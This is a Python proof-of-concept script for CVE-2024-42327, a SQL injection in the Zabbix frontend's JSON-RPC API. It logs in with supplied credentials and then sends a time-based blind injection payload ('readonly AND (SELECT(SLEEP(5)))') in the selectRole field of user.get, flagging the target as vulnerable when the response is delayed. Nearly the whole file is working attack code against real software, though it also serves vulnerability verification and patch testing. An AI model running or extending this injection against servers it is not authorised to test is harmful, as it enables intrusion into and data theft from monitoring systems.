cve-2024-42327.py
import requests
import argparse
import time
"""
Optimized Proof of Concept for CVE-2024-42327
Author: Patrick Schmid (compr00t.bsky.social)
References:
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623
Disclaimer:
This script is provided for educational purposes only!
"""
# Headers sent with every JSON-RPC request in this script; the bodies themselves
# are JSON-encoded by requests through its json= argument.
HEADERS = {"Content-Type": "application/json"}
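def get_auth_token(target, username, password):
    """Log in through the JSON-RPC API and return the session token.

    Args:
        target: Base URL of the frontend; ``/api_jsonrpc.php`` is appended.
        username: Account name passed to ``user.login``.
        password: Password passed to ``user.login``.

    Returns:
        The value of the ``result`` member of the login response, or ``None``
        when the request fails, the body is not JSON, or no result is present.
    """
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    login_data = {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"username": username, "password": password},
        "id": 1,
        "auth": None
    }
    try:
        # requests has no default timeout; without one a stalled or filtered
        # host blocks the script forever. (connect, read) in seconds.
        response = requests.post(
            url, json=login_data, headers=HEADERS, timeout=(10, 30)
        )
        response.raise_for_status()
        body = response.json()
    except requests.exceptions.RequestException as e:
        print(f"[-] Login request failed: {e}")
        return None
    except ValueError:
        print("[-] Failed to decode JSON response during login.")
        return None

    # A JSON body that is not an object (e.g. a list) has no "result" member;
    # treat it like a failed login instead of raising AttributeError.
    result = body.get("result") if isinstance(body, dict) else None
    if not result:
        print("[-] Failed to retrieve session token. Check credentials.")
        return None

    # NOTE(review): the token is a live credential for the account used. It is
    # echoed to stdout here, so it ends up in terminal scrollback and in any
    # captured output; treat such logs as sensitive.
    print(f"[+] Session token: {result}")
    return result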
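def test_sqli(target, auth_token):
    """Run the time-based check for CVE-2024-42327 and print a verdict.

    Two ``user.get`` calls are timed: a control request with plain
    ``selectRole`` fields, and the probe request whose last field carries the
    ``SLEEP(5)`` expression. The verdict is based on the delay the probe adds
    over the control, so a server or network that is merely slow is not
    reported as vulnerable. A JSON-RPC ``error`` in either response is shown
    to the operator instead of being silently counted as "not vulnerable".

    Args:
        target: Base URL of the frontend; ``/api_jsonrpc.php`` is appended.
        auth_token: Session token sent in the ``auth`` member of each request.

    Returns:
        None. The outcome is printed.
    """
    url = f"{target.rstrip('/')}/api_jsonrpc.php"
    delay = 5  # seconds; must match the SLEEP() value in probe_fields below
    # requests has no default timeout. The read timeout is well above `delay`
    # so that the delayed response itself is not cut off.
    timeout = (10, 60)
    control_fields = ["roleid", "name", "type", "readonly"]
    probe_fields = ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"]

    def timed_user_get(select_role):
        """Send one user.get call; return (elapsed seconds, JSON-RPC error or None)."""
        user_data = {
            "jsonrpc": "2.0",
            "method": "user.get",
            "params": {
                "selectRole": select_role,
                "userids": ["1", "2"]
            },
            "id": 1,
            "auth": auth_token
        }
        started = time.perf_counter()
        response = requests.post(
            url, json=user_data, headers=HEADERS, timeout=timeout
        )
        elapsed = time.perf_counter() - started
        response.raise_for_status()
        body = response.json()
        error = body.get("error") if isinstance(body, dict) else None
        return elapsed, error

    try:
        baseline_time, baseline_error = timed_user_get(control_fields)
        if baseline_error:
            # The control request contains nothing unusual; if the API rejects
            # it (expired token, missing permission, ...) timing the probe
            # would say nothing about the target.
            print(f"[-] Control request was rejected, result inconclusive: {baseline_error}")
            return

        elapsed_time, probe_error = timed_user_get(probe_fields)
        added_delay = elapsed_time - baseline_time
        if added_delay >= delay:
            print(
                f"[!] Response time: {elapsed_time:.2f} seconds "
                f"(control: {baseline_time:.2f}). Target is VULNERABLE!"
            )
        elif probe_error:
            print(f"[+] No added delay; the API rejected the probe field: {probe_error}")
        else:
            print(
                f"[+] No added delay (probe {elapsed_time:.2f}s, "
                f"control {baseline_time:.2f}s). Target is NOT vulnerable."
            )
    except requests.exceptions.RequestException as e:
        print(f"[-] SQLi test request failed: {e}")
    except ValueError:
        print("[-] Failed to decode JSON response during SQLi test.")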
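def main():
    """Parse the command line, log in, and run the check if login succeeded."""
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2024-42327"
    )
    # The functions below append /api_jsonrpc.php themselves, so the value
    # expected here is the frontend base URL, not the full API endpoint.
    parser.add_argument(
        "-t", "--target", required=True,
        help="Base URL of the Zabbix frontend (/api_jsonrpc.php is appended).",
    )
    parser.add_argument("-u", "--username", required=True, help="The username for authentication.")
    # NOTE(review): a password given on the command line is visible in the
    # process list and is usually saved in shell history.
    parser.add_argument("-p", "--password", required=True, help="The password for authentication.")
    args = parser.parse_args()

    auth_token = get_auth_token(args.target, args.username, args.password)
    if auth_token:
        test_sqli(args.target, auth_token)


if __name__ == "__main__":
    main()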